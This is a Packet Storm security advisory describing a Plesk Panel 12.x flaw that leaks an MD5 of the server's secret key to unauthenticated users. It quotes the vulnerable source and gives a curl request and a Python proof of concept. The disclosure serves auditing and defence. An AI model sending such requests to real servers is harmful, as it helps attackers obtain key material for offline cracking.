exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Parallels Plesk Panel 12.x Key Disclosure

Parallels Plesk Panel 12.x Key Disclosure
Posted Apr 22, 2014
Authored by Tim Rots

Parallels Plesk Panel version 12.x for Linux discloses /etc/psa/private/secret_key as an MD5 hash allowing for offline attacks to crack it.

tags | exploit, info disclosure
systems | linux
SHA-256 | 1445454f592a31c6187c107c5845c4007b83d4ca8f3adc887948aa9909a38116

Parallels Plesk Panel 12.x Key Disclosure

Change Mirror Download
While auditing the source code for Parallels Plesk Panel 12.x on Linux I
noticed the following feature that leads to leakage of the
'/etc/psa/private/secret_key'-file in md5 format to non-authenticated users.

Parallels responded that the 16byte 'secret_key' should provide sufficient
entropy for this not being an issue.
Soooo... even if I can control part of the salt to calculate the md5sum..?
See for yourself.


Code where the bug resides in:
----
/opt/psa/admin/htdocs/enterprise/rsession_init.php

31 if ($failureRedirectUrl = get_gpc('failure_redirect_url')) {
36 hspc_setopt('failure_redirect_url', $failureRedirectUrl);
>37 hspc_setopt('failure_redirect_url_sign', md5($failureRedirectUrl .
Plesk_Base_Utils_String::getCryptKey()));
38 }
...
..
/opt/psa/admin/plib/Plesk/Base/Utils/String.php

363 final public static function getCryptKey() {
...
369 if (Os::UNIX) {
370 self::$_cryptKey = @file_get_contents(ENCRYPT_KEY_FILE);
..
380 return self::$_cryptKey;
381 }
...
..
/opt/psa/admin/plib/compile_time_defaults.php

12 define('ENCRYPT_KEY_FILE', "/etc/psa/private/secret_key");
----


Summary of bug:

- user sends 1 HTTP requst to rsession_init.php on the remote server which
contains an invalid PHPSESSIONID and a redirect URL for when the login
fails.
- script sets two cookies which contains the following values:
failure_redirect_url = $failureRedirectUrl (supplied in URL)
failure_redirect_url_sign = md5($failureRedirectUrl + contents
/etc/psa/private/secret_key)

[+] Annoying redirect loop if localhost is specified as url to to redirect
to when login fails until cookies are cleared.


PoC:
root@debian7:~# #see /usr/local/psa/admin/sbin/encrypt_keygen for details
on key generation routine
root@debian7:~# dd if=/dev/urandom of=/etc/psa/private/secret_key bs=16
count=1
1+0 records in
1+0 records out
16 bytes (16 B) copied, 0.000183366 s, 87.3 kB/s

root@debian7:~# hexdump -C /etc/psa/private/secret_key
00000000 99 51 17 9a c6 8c 6e bd 4a 75 98 73 e2 64 fa e4
|.Q....n.Ju.s.d..|


$ curl -k -i -s "
https://debian7:8443/enterprise/rsession_init.php?PHPSESSID=000000000000000000000000000000000&failure_redirect_url=w00t"|awk
'/fail/ {print $2}'
.
..
...
failure_redirect_url=w00t;
failure_redirect_url_sign=03ba5675030c59bf66bbc2f4d30aec61;


root@debian7:~# ./poc.py
03ba5675030c59bf66bbc2f4d30aec61

---poc.py---
#! /usr/bin/env python

import hashlib
import binascii

with open('/etc/psa/private/secret_key') as f:
whoops = hashlib.md5("w00t" +
binascii.unhexlify(f.read().encode('hex'))).hexdigest()
print whoops
------


In theory this bug will give you enough ammunition to calculate the
contents of the /etc/psa/private/secret_key as we have part of the salt,
and already know the outcome of a insecure hashing algorithm to match
against.
I'm glad nobody owns the amount of computing power which is required to
abuse this bug nowadays anyhow .. :']

Regards,

Tim Rots

The Netherlands


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close